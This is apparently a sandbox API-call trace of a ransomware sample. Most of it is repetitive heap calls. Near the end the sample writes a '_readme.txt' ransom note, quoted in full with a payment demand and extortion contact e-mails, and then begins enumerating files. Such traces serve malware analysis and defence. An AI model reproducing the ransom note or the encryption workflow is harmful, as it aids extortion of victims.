Flags=0x0, Size=0x20) returned 0x32863c8 [0209.895] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.895] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.895] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.895] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.895] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.895] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.895] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.895] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.895] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.895] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.895] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.895] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.895] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.896] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.896] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.896] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.896] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.896] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.896] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.896] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.896] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.896] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.896] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.896] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.896] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.896] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.896] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.896] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.896] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.896] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.896] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.896] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.896] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.896] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.896] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.896] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.896] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.896] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.897] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.897] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.897] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.897] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.897] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.897] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.897] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.897] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.897] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.897] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.897] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.897] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.897] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.897] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.897] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.897] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.897] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.897] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.897] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.897] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.897] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.897] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.897] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.897] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.897] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.898] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.898] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.898] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.898] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.898] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.898] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.898] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.898] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.898] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.898] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.898] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.898] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.898] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.898] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.898] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.898] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.898] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.898] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.898] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.898] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.898] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.898] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.898] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.898] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.898] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.899] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.899] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.899] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.899] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.899] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.899] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.899] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.899] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.899] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.899] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.899] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.899] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.899] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.899] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.899] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.899] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.899] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.899] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.899] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.899] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.899] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.899] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.899] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.899] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.899] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.900] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.900] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.900] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.900] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.900] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.900] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.900] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.900] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.900] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.900] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.900] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.900] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.900] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.900] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.900] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.900] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.900] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.900] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.900] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.900] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.900] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.900] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.900] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.900] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.900] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.901] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.901] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.901] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.901] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.901] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.901] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.901] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.901] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.901] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.901] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.901] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.901] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.901] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.901] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.901] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.901] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.901] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.901] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.901] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.901] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.901] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.901] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.901] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.901] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.902] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.902] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.902] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.902] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.902] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.902] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.902] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.902] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.902] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.902] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.902] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.902] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.902] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.902] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.902] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.902] PathFindFileNameW (pszPath="C:\\Boot\\zh-HK\\") returned="zh-HK\\" [0209.902] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.902] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0209.902] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.902] PathFindFileNameW (pszPath="") returned="" [0209.902] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.903] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0209.903] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0209.903] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x800) returned 0x3a83058 [0209.903] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0209.903] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x32d9428 [0209.903] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.903] FreeLibrary (hLibModule=0x761b0000) returned 1 [0209.904] PathAppendW (in: pszPath="C:\\Boot\\zh-HK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 1 [0209.904] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.904] PathFileExistsW (pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 0 [0209.910] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x7d00) returned 0x3a87060 [0209.910] lstrcpyW (in: lpString1=0x3a87060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0209.910] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0209.910] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32da538 [0209.910] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\_readme.txt" (normalized: "c:\\boot\\zh-hk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.911] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.911] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, 